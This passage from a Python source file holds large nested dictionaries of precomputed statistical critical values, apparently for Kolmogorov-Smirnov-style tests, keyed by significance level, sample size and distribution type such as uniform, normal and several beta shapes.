0.43855945433022814, 'nor': 0.12660427792231924, 'beta1': 0.4534542449640568, 'beta2': 0.9078879160230264, 'beta4': 0.18851203766812671}, 50: {'uni': 0.42185603966628915, 'nor': 0.1251135767029667, 'beta1': 0.4529463879788932, 'beta2': 0.7785693328825756, 'beta4': 0.18783979338011667}, 30: {'uni': 0.4007242486006498, 'nor': 0.12536020919060598, 'beta1': 0.433955290048165, 'beta2': 0.6300668797650217, 'beta4': 0.18309677695119683}, 20: {'uni': 0.37357963600331506, 'nor': 0.1244502347645548, 'beta1': 0.4098571660526302, 'beta2': 0.52578110215289, 'beta4': 0.17583001005443635}, 10: {'uni': 0.3015175081905277, 'nor': 0.12299654131879613, 'beta1': 0.3385532447833868, 'beta2': 0.35993981010958676, 'beta4': 0.1589058816117949}}, 0.001: {1000: {'uni': 1.161161598361952, 'nor': 0.2558443498119062, 'beta1': 1.1479519803384115, 'beta2': 6.709302131132306, 'beta4': 0.44475223680375087}, 750: {'uni': 1.151578196881537, 'nor': 0.2555050176799102, 'beta1': 1.1555400330755854, 'beta2': 5.432775518995104, 'beta4': 0.4383116823384742}, 500: {'uni': 1.1484428347021816, 'nor': 0.25417015345250027, 'beta1': 1.179178309999159, 'beta2': 4.891239107169016, 'beta4': 0.4389087929008622}, 400: {'uni': 1.1930541236855035, 'nor': 0.2518343883827663, 'beta1': 1.1803881424592395, 'beta2': 4.300235437758729, 'beta4': 0.4386478457920091}, 300: {'uni': 1.1473970431560971, 'nor': 0.25317628629366085, 'beta1': 1.1624327986427483, 'beta2': 3.8989413853739827, 'beta4': 0.44551847042340587}, 200: {'uni': 1.18082412252855, 'nor': 0.25899079782112855, 'beta1': 1.2025828386510071, 'beta2': 3.391511017366001, 'beta4': 0.4405063674404278}, 150: {'uni': 1.1387187678474655, 'nor': 0.25321382063754555, 'beta1': 1.1466986042414955, 'beta2': 2.970375106650482, 'beta4': 0.4398607423338549}, 100: {'uni': 1.1146160300547057, 'nor': 0.2591267084483367, 'beta1': 1.123764591588948, 'beta2': 2.557181557186044, 'beta4': 0.4349804526379736}, 75: {'uni': 1.1036094150895535, 'nor': 0.25037527962652184, 'beta1': 
1.1576098464988671, 'beta2': 2.255565186689404, 'beta4': 0.4283114412555718}, 50: {'uni': 1.06359109192906, 'nor': 0.2593884319637725, 'beta1': 1.1172655406958785, 'beta2': 1.9088453990800698, 'beta4': 0.4147307819414802}, 30: {'uni': 0.9806221663466906, 'nor': 0.24979623637195073, 'beta1': 1.0995943461327278, 'beta2': 1.5374147736094401, 'beta4': 0.40449471961197647}, 20: {'uni': 0.9183844094874211, 'nor': 0.2410666264484626, 'beta1': 1.0121027232912676, 'beta2': 1.2429536313291623, 'beta4': 0.3910244272778875}, 10: {'uni': 0.705105426746303, 'nor': 0.2356691665356145, 'beta1': 0.7805556315358917, 'beta2': 0.8041905799529989, 'beta4': 0.3422805857620354}}, 0.005: {1000: {'uni': 0.8650500727527625, 'nor': 0.20355208320636353, 'beta1': 0.8609196227705078, 'beta2': 5.144036940610599, 'beta4': 0.3365600054421361}, 750: {'uni': 0.8626986115937819, 'nor': 0.1982484245115105, 'beta1': 0.8768929537385406, 'beta2': 4.121713329611062, 'beta4': 0.340394884525468}, 500: {'uni': 0.8463252948272091, 'nor': 0.204047905448246, 'beta1': 0.8643194167991456, 'beta2': 3.7142396090256673, 'beta4': 0.338149801728149}, 400: {'uni': 0.8759613393266179, 'nor': 0.20113796554865335, 'beta1': 0.8720674011608025, 'beta2': 3.234826377969159, 'beta4': 0.33251013574505706}, 300: {'uni': 0.8467830546773162, 'nor': 0.19835890349416413, 'beta1': 0.8625806550035283, 'beta2': 2.91747054310664, 'beta4': 0.3337907894045298}, 200: {'uni': 0.8671446864117717, 'nor': 0.19955136121772268, 'beta1': 0.8799640423750006, 'beta2': 2.5611562585381584, 'beta4': 0.33340460979200826}, 150: {'uni': 0.8504532982772084, 'nor': 0.20114192058643274, 'beta1': 0.8585546641050331, 'beta2': 2.2731935785727866, 'beta4': 0.33516132028355133}, 100: {'uni': 0.8262581996585238, 'nor': 0.20172429821482568, 'beta1': 0.8566261612415256, 'beta2': 1.9386478314789783, 'beta4': 0.33057577054096593}, 75: {'uni': 0.8231601092929631, 'nor': 0.19954548808488737, 'beta1': 0.8507692286383358, 'beta2': 1.7184750351160816, 'beta4': 
0.3281716117279958}, 50: {'uni': 0.791311042044641, 'nor': 0.20201644061099297, 'beta1': 0.8253344560388312, 'beta2': 1.471598126502107, 'beta4': 0.3142747378332868}, 30: {'uni': 0.7454004085339159, 'nor': 0.19868948854462629, 'beta1': 0.8117279190997636, 'beta2': 1.163572754042539, 'beta4': 0.3134379622253203}, 20: {'uni': 0.6927111395174737, 'nor': 0.19799803099243843, 'beta1': 0.7690007170290268, 'beta2': 0.9674971023639148, 'beta4': 0.29755522914247085}, 10: {'uni': 0.5404922820663465, 'nor': 0.1897950283341688, 'beta1': 0.6048954133188673, 'beta2': 0.6396273271986439, 'beta4': 0.2661737354047272}}, 0.01: {1000: {'uni': 0.7366305701442963, 'nor': 0.18079399258995782, 'beta1': 0.7409500769469214, 'beta2': 4.379123588591741, 'beta4': 0.2924280426122813}, 750: {'uni': 0.7442238251513217, 'nor': 0.17730654116361785, 'beta1': 0.7432715265134635, 'beta2': 3.520644408051276, 'beta4': 0.2948533948139171}, 500: {'uni': 0.7295640623706077, 'nor': 0.18058378329387692, 'beta1': 0.7432308493338711, 'beta2': 3.1831218453213364, 'beta4': 0.29273348151982065}, 400: {'uni': 0.74825746560008, 'nor': 0.17857559572928583, 'beta1': 0.7513046011459512, 'beta2': 2.7813333770088593, 'beta4': 0.2920493370610846}, 300: {'uni': 0.7346085309181084, 'nor': 0.17814686297600194, 'beta1': 0.7384559054473249, 'beta2': 2.5293538764033396, 'beta4': 0.2930624211260037}, 200: {'uni': 0.7291492259573107, 'nor': 0.1770738854920472, 'beta1': 0.7468672378966367, 'beta2': 2.198188994091246, 'beta4': 0.2919775882512319}, 150: {'uni': 0.7235173729542574, 'nor': 0.17865467815894331, 'beta1': 0.7334497638668434, 'beta2': 1.9672046766786264, 'beta4': 0.2923645746551409}, 100: {'uni': 0.7062948565843012, 'nor': 0.17810159631256017, 'beta1': 0.7375298250695946, 'beta2': 1.6478430914391802, 'beta4': 0.2864079167189714}, 75: {'uni': 0.7048541225084534, 'nor': 0.1782357072385056, 'beta1': 0.7291152927800391, 'beta2': 1.4723510105994482, 'beta4': 0.28510459988581655}, 50: {'uni': 0.6822877555314413, 'nor': 
0.17832163110271299, 'beta1': 0.7058926323102283, 'beta2': 1.2628603110009782, 'beta4': 0.2762680230658396}, 30: {'uni': 0.6438645415806148, 'nor': 0.17641294567529855, 'beta1': 0.6988358937799531, 'beta2': 1.00261546291451, 'beta4': 0.2728708936653677}, 20: {'uni': 0.5979389276979273, 'nor': 0.17733658586090492, 'beta1': 0.6634216883500963, 'beta2': 0.8401862828094895, 'beta4': 0.2581148398098823}, 10: {'uni': 0.47439214163279075, 'nor': 0.17006126698160068, 'beta1': 0.5291255307312486, 'beta2': 0.5561342600451974, 'beta4': 0.23396694517733096}}, 0.1: {1000: {'uni': 0.34460694172229767, 'nor': 0.10360382794686329, 'beta1': 0.34720511538309606, 'beta2': 1.8875836943154027, 'beta4': 0.15367514351394482}, 750: {'uni': 0.3451867692665267, 'nor': 0.10315529568661869, 'beta1': 0.3483346351805406, 'beta2': 1.5286450857480112, 'beta4': 0.1542030881869177}, 500: {'uni': 0.34164207323070384, 'nor': 0.10394394883772727, 'beta1': 0.34942375915790075, 'beta2': 1.3882095566154824, 'beta4': 0.15391095453357267}, 400: {'uni': 0.34651892768462955, 'nor': 0.1036273981872271, 'beta1': 0.3462081705189476, 'beta2': 1.2069446519288858, 'beta4': 0.1544497253882817}, 300: {'uni': 0.3428635737550537, 'nor': 0.1038942851019886, 'beta1': 0.3476223025035556, 'beta2': 1.1098635931611327, 'beta4': 0.15444570971940158}, 200: {'uni': 0.34041089582801143, 'nor': 0.10389233254481366, 'beta1': 0.34763445978967616, 'beta2': 0.9680266999416997, 'beta4': 0.15250676214014847}, 150: {'uni': 0.3377302693762681, 'nor': 0.10346526116949699, 'beta1': 0.34489227504038494, 'beta2': 0.8728702651269197, 'beta4': 0.1522928420716538}, 100: {'uni': 0.33355369989756883, 'nor': 0.10342904850983256, 'beta1': 0.3427607367426677, 'beta2': 0.7468081520100366, 'beta4': 0.151846388902334}, 75: {'uni': 0.3279519851250598, 'nor': 0.1033051672049144, 'beta1': 0.34059079399004955, 'beta2': 0.6701570036198051, 'beta4': 0.1507237727552958}, 50: {'uni': 0.320726154832351, 'nor': 0.10326137162907119, 'beta1': 0.33950765789386894, 
'beta2': 0.5746838732278858, 'beta4': 0.1476312595625842}, 30: {'uni': 0.3048544686945858, 'nor': 0.1032506284925571, 'beta1': 0.3272112572888899, 'beta2': 0.4681866459910121, 'beta4': 0.14446811972146092}, 20: {'uni': 0.2846944243235544, 'nor': 0.1028801774665988, 'beta1': 0.31098139768353583, 'beta2': 0.39502874401480026, 'beta4': 0.14018723197105618}, 10: {'uni': 0.23151476199873214, 'nor': 0.10222753291379459, 'beta1': 0.2591691265371872, 'beta2': 0.27317146177593893, 'beta4': 0.12824901267237765}}, 0.2: {1000: {'uni': 0.23891699447877507, 'nor': 0.08094731846506226, 'beta1': 0.24094997843944543, 'beta2': 1.1721114900242817, 'beta4': 0.11543501824848225}, 750: {'uni': 0.2404933108907096, 'nor': 0.08091514974400534, 'beta1': 0.24060333173620502, 'beta2': 0.9693351882078056, 'beta4': 0.11578575775778918}, 500: {'uni': 0.23767299214394635, 'nor': 0.08143013376811509, 'beta1': 0.24272727287877066, 'beta2': 0.8833066278909469, 'beta4': 0.11540869401380342}, 400: {'uni': 0.2389502568536976, 'nor': 0.08131132500068124, 'beta1': 0.23929939472873027, 'beta2': 0.7740123343256322, 'beta4': 0.11612370917705966}, 300: {'uni': 0.23767421960657104, 'nor': 0.08137026978935988, 'beta1': 0.2413717405506026, 'beta2': 0.7075931771768734, 'beta4': 0.11572673022823697}, 200: {'uni': 0.2375380459668403, 'nor': 0.08138169789779784, 'beta1': 0.24093637511896582, 'beta2': 0.6212880525665451, 'beta4': 0.11464757578960799}, 150: {'uni': 0.2346674147394386, 'nor': 0.08111648704644667, 'beta1': 0.23871828329053957, 'beta2': 0.5639043523411755, 'beta4': 0.1144192658708614}, 100: {'uni': 0.23144277683193992, 'nor': 0.08086088008195286, 'beta1': 0.23765747593958084, 'beta2': 0.4871104294369415, 'beta4': 0.11369840709232508}, 75: {'uni': 0.22903357158577958, 'nor': 0.08107942066962537, 'beta1': 0.23687860277184203, 'beta2': 0.4387740764573971, 'beta4': 0.1133033325819042}, 50: {'uni': 0.22282964313663456, 'nor': 0.08128764938651908, 'beta1': 0.23467305038546576, 'beta2': 0.38174763155086583, 
'beta4': 0.1112554646459918}, 30: {'uni': 0.21121535286091023, 'nor': 0.08154061002867806, 'beta1': 0.22669185244123524, 'beta2': 0.3149719244556432, 'beta4': 0.1087977058346659}, 20: {'uni': 0.19948749085011552, 'nor': 0.08117232367036036, 'beta1': 0.21669660949781708, 'beta2': 0.2693729942635194, 'beta4': 0.10597716119365037}, 10: {'uni': 0.16430469528177583, 'nor': 0.08150777731263585, 'beta1': 0.18122070967231182, 'beta2': 0.19059913324778516, 'beta4': 0.09776227574034621}}, 0.25: {1000: {'uni': 0.2073622245210208, 'nor': 0.07380009436406758, 'beta1': 0.20904068646385907, 'beta2': 0.9597148435930869, 'beta4': 0.10361053731297827}, 750: {'uni': 0.20830280107305865, 'nor': 0.07380726982919651, 'beta1': 0.2085995996243024, 'beta2': 0.7986091394776444, 'beta4': 0.10386137028660365}, 500: {'uni': 0.2063708005028261, 'nor': 0.07418743470211109, 'beta1': 0.21009413000274246, 'beta2': 0.7233087867046614, 'beta4': 0.103532945392617}, 400: {'uni': 0.20810791282236252, 'nor': 0.07407319000419614, 'beta1': 0.20749468421255743, 'beta2': 0.639061150743961, 'beta4': 0.1039097259786984}, 300: {'uni': 0.2069617339473839, 'nor': 0.07417041380366121, 'beta1': 0.20881311523590293, 'beta2': 0.5873404580341767, 'beta4': 0.10365164703335579}, 200: {'uni': 0.20633618881322238, 'nor': 0.07431380328185423, 'beta1': 0.2096349293319493, 'beta2': 0.5182222647556451, 'beta4': 0.10246873175611658}, 150: {'uni': 0.20397320572124797, 'nor': 0.07400405520839556, 'beta1': 0.20711157206009445, 'beta2': 0.47119547735400447, 'beta4': 0.10276373650008787}, 100: {'uni': 0.20130936260465182, 'nor': 0.07387183501067715, 'beta1': 0.20687465898503946, 'beta2': 0.40718701425151566, 'beta4': 0.10182092379405154}, 75: {'uni': 0.19852776314003645, 'nor': 0.07393158430130788, 'beta1': 0.20550667909573891, 'beta2': 0.3693192980610446, 'beta4': 0.10150395150740255}, 50: {'uni': 0.19388474978484183, 'nor': 0.07420083364025896, 'beta1': 0.20350014172907788, 'beta2': 0.32356832480704306, 'beta4': 
0.0999746406180958}, 30: {'uni': 0.18355727709549313, 'nor': 0.07451794632809351, 'beta1': 0.19616222630838362, 'beta2': 0.26786333649854016, 'beta4': 0.0976861971100757}, 20: {'uni': 0.17328456961586736, 'nor': 0.07429319062250538, 'beta1': 0.18715487185431445, 'beta2': 0.23051142471255764, 'beta4': 0.09527608612752941}, 10: {'uni': 0.1439420051439661, 'nor': 0.07448506284496655, 'beta1': 0.15783717122161106, 'beta2': 0.165322481393709, 'beta4': 0.0881875611186847}}, 0.3: {1000: {'uni': 0.18266493036122441, 'nor': 0.06787398648836995, 'beta1': 0.18413714303934486, 'beta2': 0.7939484739262997, 'beta4': 0.09424089113895272}, 750: {'uni': 0.1834933385424178, 'nor': 0.06774823495176488, 'beta1': 0.18328690579924797, 'beta2': 0.6657885178958219, 'beta4': 0.09411764242286233}, 500: {'uni': 0.18210747710096634, 'nor': 0.0682050076857646, 'beta1': 0.18545982860570304, 'beta2': 0.6035300802969183, 'beta4': 0.09382274022146861}, 400: {'uni': 0.18303077478939317, 'nor': 0.06803420606952354, 'beta1': 0.1832023300936057, 'beta2': 0.5348503605172882, 'beta4': 0.09439504810213005}, 300: {'uni': 0.18177746911539827, 'nor': 0.06818473058282226, 'beta1': 0.18428212132088345, 'beta2': 0.4902376235565143, 'beta4': 0.09403788951347426}, 200: {'uni': 0.1816800164976337, 'nor': 0.06833889279734263, 'beta1': 0.18433678860840758, 'beta2': 0.4357735417384846, 'beta4': 0.0930165257817752}, 150: {'uni': 0.17998814397403265, 'nor': 0.06806323128922373, 'beta1': 0.18235304873781227, 'beta2': 0.3987631304299662, 'beta4': 0.09300297461109802}, 100: {'uni': 0.17734862196792756, 'nor': 0.06787056258025743, 'beta1': 0.18232920738794536, 'beta2': 0.34628591421707594, 'beta4': 0.09251758018601589}, 75: {'uni': 0.17501811415904828, 'nor': 0.06794778939736534, 'beta1': 0.1811216846739435, 'beta2': 0.31515956986054794, 'beta4': 0.09227802527028829}, 50: {'uni': 0.17127286320423607, 'nor': 0.06825835640417134, 'beta1': 0.1783095339004599, 'beta2': 0.2773715225887576, 'beta4': 0.09083180121082819}, 30: 
{'uni': 0.16210318531956106, 'nor': 0.06864306659301066, 'beta1': 0.17243143687559875, 'beta2': 0.23158692745518694, 'beta4': 0.08861156990151152}, 20: {'uni': 0.15293857531053232, 'nor': 0.06842370561655187, 'beta1': 0.1646586342377624, 'beta2': 0.20028710138975353, 'beta4': 0.08663292264169759}, 10: {'uni': 0.12764289106639928, 'nor': 0.06890998128086945, 'beta1': 0.13899778934023796, 'beta2': 0.1452153818161471, 'beta4': 0.08038247939430213}}} # noqa: E501, E231 crit_val_upd_ks = {0.001: {1000: {1000: {'uni': 0.06194167830060293, 'nor': 0.07822872053106872, 'beta1': 0.060972223483102383, 'beta2': 0.1259312803264634, 'beta4': 0.053644805280471275}, 750: {'uni': 0.07013498250410122, 'nor': 0.0846176702668644, 'beta1': 0.07382074910040726, 'beta2': 0.12721212549622074, 'beta4': 0.06265031431957047}, 500: {'uni': 0.08868191404192605, 'nor': 0.10172187597321586, 'beta1': 0.08635714610250639, 'beta2': 0.1354501683123147, 'beta4': 0.07939958283221715}, 400: {'uni': 0.09466328320945472, 'nor': 0.10653424583665405, 'beta1': 0.09812143640789389, 'beta2': 0.14231851569369025, 'beta4': 0.09001786186298039}, 300: {'uni': 0.112900393327934, 'nor': 0.11948590318054664, 'beta1': 0.1128099223418304, 'beta2': 0.15412182838111443, 'beta4': 0.10688640573728891}, 200: {'uni': 0.13999451914937044, 'nor': 0.14525209648524945, 'beta1': 0.1363146522235133, 'beta2': 0.17279316051643773, 'beta4': 0.13132853027863567}, 150: {'uni': 0.15825801427544206, 'nor': 0.16624699603775567, 'beta1': 0.15782699160464128, 'beta2': 0.19586569775328777, 'beta4': 0.15093718225825237}, 100: {'uni': 0.19109919414724275, 'nor': 0.19819275001361214, 'beta1': 0.19211678955447464, 'beta2': 0.21880574483038184, 'beta4': 0.18949005031175215}, 75: {'uni': 0.2198169498248439, 'nor': 0.22313893040183352, 'beta1': 0.22260086497739834, 'beta2': 0.24861080819897047, 'beta4': 0.21646042451513092}, 50: {'uni': 0.27110531940815974, 'nor': 0.26870229964436126, 'beta1': 0.27154448822648203, 'beta2': 0.2925856220451067, 
'beta4': 0.2690827053650406}, 30: {'uni': 0.341159036875694, 'nor': 0.34417584958804415, 'beta1': 0.34742946906497024, 'beta2': 0.35887753792308147, 'beta4': 0.34251314662315646}, 20: {'uni': 0.4247074513367157, 'nor': 0.4257230167126152, 'beta1': 0.4147166360680411, 'beta2': 0.42712883590666906, 'beta4': 0.4243734735369824}, 10: {'uni': 0.5883376017796452, 'nor': 0.5763352676031682, 'beta1': 0.5744260319735885, 'beta2': 0.5823827801917355, 'beta4': 0.5678433762722503}}, 750: {1000: {'uni': 0.0611759570618689, 'nor': 0.08090222271917469, 'beta1': 0.06269089313861997, 'beta2': 0.12229377182596635, 'beta4': 0.05189322774912314}, 750: {'uni': 0.06999691237536224, 'nor': 0.08755856539246498, 'beta1': 0.07015966614757518, 'beta2': 0.12824148557035264, 'beta4': 0.06188500275856437}, 500: {'uni': 0.08538842360253246, 'nor': 0.10140984451333485, 'beta1': 0.08689642339864323, 'beta2': 0.1347503234468263, 'beta4': 0.07734069816818492}, 400: {'uni': 0.09683865057491581, 'nor': 0.11198143598374655, 'beta1': 0.0966354900118695, 'beta2': 0.14394540297183944, 'beta4': 0.08763861812335089}, 300: {'uni': 0.11157253985246895, 'nor': 0.12602422854188344, 'beta1': 0.11244663757346751, 'beta2': 0.1554651616593184, 'beta4': 0.10415578668422443}, 200: {'uni': 0.13654464830576057, 'nor': 0.15133013476858165, 'beta1': 0.13839044278268253, 'beta2': 0.16561454357136107, 'beta4': 0.13143244333617032}, 150: {'uni': 0.15622840528205983, 'nor': 0.16817043946341126, 'beta1': 0.15548905512988154, 'beta2': 0.18938825998267717, 'beta4': 0.14980964956382015}, 100: {'uni': 0.19579707682616415, 'nor': 0.19493448629254073, 'beta1': 0.1907364681295448, 'beta2': 0.21379910922104456, 'beta4': 0.18921973720089247}, 75: {'uni': 0.2217040971984533, 'nor': 0.22676199918015594, 'beta1': 0.22281270555321675, 'beta2': 0.24553068147624701, 'beta4': 0.2185653911488343}, 50: {'uni': 0.28058489484935584, 'nor': 0.2726192686778714, 'beta1': 0.27549434346061347, 'beta2': 0.2963953500479535, 'beta4': 
0.2613706221802624}, 30: {'uni': 0.3542190682518411, 'nor': 0.3609105538670239, 'beta1': 0.346103596210534, 'beta2': 0.37037725489911305, 'beta4': 0.34271197416665083}, 20: {'uni': 0.4192705279674709, 'nor': 0.4227233474310455, 'beta1': 0.41559337298012755, 'beta2': 0.4320244942862363, 'beta4': 0.417645435565697}, 10: {'uni': 0.581210346357099, 'nor': 0.5914300273318283, 'beta1': 0.5798222632426484, 'beta2': 0.576140120904139, 'beta4': 0.5755991159580565}}, 500: {1000: {'uni': 0.06036407215881656, 'nor': 0.09090115403529747, 'beta1': 0.06255930197979287, 'beta2': 0.13359354983685368, 'beta4': 0.05069644528510775}, 750: {'uni': 0.07028443525653139, 'nor': 0.09555844399847702, 'beta1': 0.07153464071873405, 'beta2': 0.139381271869496, 'beta4': 0.060482876205486535}, 500: {'uni': 0.08736257185674318, 'nor': 0.10986008971817585, 'beta1': 0.08806460210132372, 'beta2': 0.14662206874056294, 'beta4': 0.07355203635067697}, 400: {'uni': 0.09738153077428247, 'nor': 0.11929320722653125, 'beta1': 0.09822023903171845, 'beta2': 0.1554507716764446, 'beta4': 0.0856711290635534}, 300: {'uni': 0.1142826184827973, 'nor': 0.13333306355949393, 'beta1': 0.11167159945610117, 'beta2': 0.16891471559153437, 'beta4': 0.10481821179485074}, 200: {'uni': 0.13674660783901085, 'nor': 0.1510767540153743, 'beta1': 0.13945129736328155, 'beta2': 0.1856231161919606, 'beta4': 0.1275501476407893}, 150: {'uni': 0.15662754110107693, 'nor': 0.17132793534131086, 'beta1': 0.1584778040085073, 'beta2': 0.20319728743391985, 'beta4': 0.14506897344382674}, 100: {'uni': 0.19187926872498368, 'nor': 0.20409409384231936, 'beta1': 0.18927583777700208, 'beta2': 0.23363291179999657, 'beta4': 0.18630089408915784}, 75: {'uni': 0.2198773014226113, 'nor': 0.22969594012702854, 'beta1': 0.22501859827640036, 'beta2': 0.2537264924207476, 'beta4': 0.22025245598758353}, 50: {'uni': 0.26703941343557996, 'nor': 0.2709855298709943, 'beta1': 0.26520771720638253, 'beta2': 0.30140881449323687, 'beta4': 0.2690849811291071}, 30: {'uni': 
0.34535681060535584, 'nor': 0.3531786350766798, 'beta1': 0.34464606252236557, 'beta2': 0.3579140519043085, 'beta4': 0.34385764547646414}, 20: {'uni': 0.41654437214179635, 'nor': 0.4238773679688896, 'beta1': 0.4156688979762777, 'beta2': 0.4342947530823177, 'beta4': 0.41234511208135727}, 10: {'uni': 0.5927880081321425, 'nor': 0.571169284617098, 'beta1': 0.5890376211941302, 'beta2': 0.5799218969338741, 'beta4': 0.5772716599910823}}, 400: {1000: {'uni': 0.061610633047749275, 'nor': 0.09387417997070269, 'beta1': 0.060006123541623435, 'beta2': 0.13359508313715762, 'beta4': 0.050499024612637056}, 750: {'uni': 0.0725990060934733, 'nor': 0.09999368681512216, 'beta1': 0.0714711957562868, 'beta2': 0.1396657769543962, 'beta4': 0.05786321789604981}, 500: {'uni': 0.08793932634136903, 'nor': 0.1132890416520379, 'beta1': 0.08764486030536317, 'beta2': 0.1506116538331888, 'beta4': 0.07384003832444169}, 400: {'uni': 0.09509051332670226, 'nor': 0.12086275924386036, 'beta1': 0.09874882902727133, 'beta2': 0.15349299194370858, 'beta4': 0.0849049812616951}, 300: {'uni': 0.11300077096060224, 'nor': 0.13104186476027302, 'beta1': 0.11236264122161288, 'beta2': 0.16671246834931386, 'beta4': 0.10114052127037293}, 200: {'uni': 0.1395767904072489, 'nor': 0.15649703354689593, 'beta1': 0.1351482372851951, 'beta2': 0.18210013561700988, 'beta4': 0.12703437853096244}, 150: {'uni': 0.15452108891403543, 'nor': 0.17408683153597787, 'beta1': 0.15978450832788405, 'beta2': 0.2010339358813732, 'beta4': 0.1490451838403622}, 100: {'uni': 0.19691519706645344, 'nor': 0.20754956592257726, 'beta1': 0.19346981123970686, 'beta2': 0.2262546151997452, 'beta4': 0.18064848788367147}, 75: {'uni': 0.22469725100342314, 'nor': 0.2339068463269146, 'beta1': 0.218862094384225, 'beta2': 0.2504781042902142, 'beta4': 0.20969832951840517}, 50: {'uni': 0.2709684908276241, 'nor': 0.28043279667873244, 'beta1': 0.2702125438110171, 'beta2': 0.2976958783167438, 'beta4': 0.2606895236787564}, 30: {'uni': 0.34168179557445916, 'nor': 
0.3593449909357798, 'beta1': 0.35415662361849687, 'beta2': 0.36288665404801707, 'beta4': 0.34182381626396197}, 20: {'uni': 0.4206707653595654, 'nor': 0.43121866894350125, 'beta1': 0.42741727811475116, 'beta2': 0.4389309415030842, 'beta4': 0.4300646949028815}, 10: {'uni': 0.5741086400057797, 'nor': 0.5830036630879967, 'beta1': 0.5709629834592885, 'beta2': 0.5875161854960175, 'beta4': 0.5881252365619546}}, 300: {1000: {'uni': 0.062161639188960005, 'nor': 0.10294382539615143, 'beta1': 0.0611596822319877, 'beta2': 0.14157458374551313, 'beta4': 0.049547505930433555}, 750: {'uni': 0.0709251826905879, 'nor': 0.11006834833669127, 'beta1': 0.07067419085948462, 'beta2': 0.14514453194775367, 'beta4': 0.058480081465393324}, 500: {'uni': 0.08637817894053323, 'nor': 0.12102770685673514, 'beta1': 0.08706590398005343, 'beta2': 0.15434162169167048, 'beta4': 0.07347251631345947}, 400: {'uni': 0.09753878203585215, 'nor': 0.12985513065211424, 'beta1': 0.0972356544421249, 'beta2': 0.1640862893662115, 'beta4': 0.08247651502832595}, 300: {'uni': 0.11086452484782922, 'nor': 0.13822319327826305, 'beta1': 0.11173259516719364, 'beta2': 0.1769745582721851, 'beta4': 0.09992542940472177}, 200: {'uni': 0.1399113243441577, 'nor': 0.15754885236536986, 'beta1': 0.136504750476084, 'beta2': 0.1941827278811873, 'beta4': 0.12077586465850387}, 150: {'uni': 0.1590697336850151, 'nor': 0.17753710966522074, 'beta1': 0.1580347543820162, 'beta2': 0.20987840790701257, 'beta4': 0.14471527608486495}, 100: {'uni': 0.1871751727081637, 'nor': 0.21427301060804643, 'beta1': 0.1929312353732119, 'beta2': 0.23670383329819866, 'beta4': 0.18070834369207195}, 75: {'uni': 0.21739174405685768, 'nor': 0.23735012999276262, 'beta1': 0.22576097503322584, 'beta2': 0.25410438149243303, 'beta4': 0.2141905644666299}, 50: {'uni': 0.2702693450523803, 'nor': 0.287556930723528, 'beta1': 0.26606292030801165, 'beta2': 0.3120374891941139, 'beta4': 0.2628605451724907}, 30: {'uni': 0.3633925191505936, 'nor': 0.3553499682791369, 'beta1': 
0.3472416410315157, 'beta2': 0.36603539622620074, 'beta4': 0.3402149887634394}, 20: {'uni': 0.43686780250760227, 'nor': 0.43357372518649273, 'beta1': 0.4365167361387447, 'beta2': 0.4400213044310824, 'beta4': 0.4227051807564033}, 10: {'uni': 0.582850916214453, 'nor': 0.5881615041484773, 'beta1': 0.5909724443518736, 'beta2': 0.5979959647698587, 'beta4': 0.5748894185128298}}, 200: {1000: {'uni': 0.06189276066343463, 'nor': 0.11833873344342205, 'beta1': 0.061831743193413335, 'beta2': 0.15906399693195816, 'beta4': 0.048460784542351754}, 750: {'uni': 0.07134707707247834, 'nor': 0.12617513205267883, 'beta1': 0.07100572922533299, 'beta2': 0.1607658467629688, 'beta4': 0.05614867367172871}, 500: {'uni': 0.08564106049840525, 'nor': 0.13304497843595064, 'beta1': 0.0874138510347292, 'beta2': 0.17131354724595504, 'beta4': 0.07175587677838369}, 400: {'uni': 0.09267272777082991, 'nor': 0.14309653474101058, 'beta1': 0.09813249384450734, 'beta2': 0.17913524248375756, 'beta4': 0.08268049428370317}, 300: {'uni': 0.10923381308894958, 'nor': 0.15222716073399284, 'beta1': 0.11266368232034613, 'beta2': 0.1854635291641431, 'beta4': 0.09615779121211337}, 200: {'uni': 0.1363804725778009, 'nor': 0.17267694139649953, 'beta1': 0.13582009258399352, 'beta2': 0.19574314248677793, 'beta4': 0.1179637069833459}, 150: {'uni': 0.15887161022374907, 'nor': 0.18432817945104918, 'beta1': 0.16199472287112165, 'beta2': 0.21773658228591058, 'beta4': 0.14255486238615406}, 100: {'uni': 0.19262944923823816, 'nor': 0.21456176331780907, 'beta1': 0.19248127836354945, 'beta2': 0.249444130339123, 'beta4': 0.17499830511234898}, 75: {'uni': 0.22633597240156172, 'nor': 0.24116115592351106, 'beta1': 0.2161337337848539, 'beta2': 0.2609793421406472, 'beta4': 0.21072808513003066}, 50: {'uni': 0.2644800919231039, 'nor': 0.297735358593486, 'beta1': 0.27231937439921694, 'beta2': 0.3102197722435756, 'beta4': 0.25709639846200694}, 30: {'uni': 0.34625180846494763, 'nor': 0.35746737858146227, 'beta1': 0.354486005184482, 'beta2': 
0.38683476647160936, 'beta4': 0.33170959441086517}, 20: {'uni': 0.4208903869972874, 'nor': 0.43552557162203065, 'beta1': 0.4221261305003158, 'beta2': 0.43662638995711245, 'beta4': 0.41463291398406665}, 10: {'uni': 0.5741138916139755, 'nor': 0.5851120398678165, 'beta1': 0.5841496889181017, 'beta2': 0.5934894074324251, 'beta4': 0.5863482781018794}}, 150: {1000: {'uni': 0.061581541028080056, 'nor': 0.13381363846898142, 'beta1': 0.06128042761918895, 'beta2': 0.1708966560232832, 'beta4': 0.04741420430861787}, 750: {'uni': 0.07217513645135509, 'nor': 0.1419413060812098, 'beta1': 0.07273928089814014, 'beta2': 0.1704412808052873, 'beta4': 0.05574805904383956}, 500: {'uni': 0.08676298708174202, 'nor': 0.14572604267188155, 'beta1': 0.08647759105067054, 'beta2': 0.18242632197904074, 'beta4': 0.068983137151813}, 400: {'uni': 0.1037742765004267, 'nor': 0.15223240381779424, 'beta1': 0.09518076159694533, 'beta2': 0.18643202068616882, 'beta4': 0.07923549680449954}, 300: {'uni': 0.11129074028405522, 'nor': 0.16268462117490684, 'beta1': 0.11075585275192301, 'beta2': 0.19821370441263542, 'beta4': 0.0912523876738719}, 200: {'uni': 0.14156920331099243, 'nor': 0.183250873096864, 'beta1': 0.13716604234880148, 'beta2': 0.2130216482290011, 'beta4': 0.11611656331446252}, 150: {'uni': 0.15991456155699446, 'nor': 0.19972632801083756, 'beta1': 0.1591623711263259, 'beta2': 0.22363803209488897, 'beta4': 0.14252665232189032}, 100: {'uni': 0.19390376852650276, 'nor': 0.2201533899028501, 'beta1': 0.18839789593786516, 'beta2': 0.24896472297863287, 'beta4': 0.1770303243572896}, 75: {'uni': 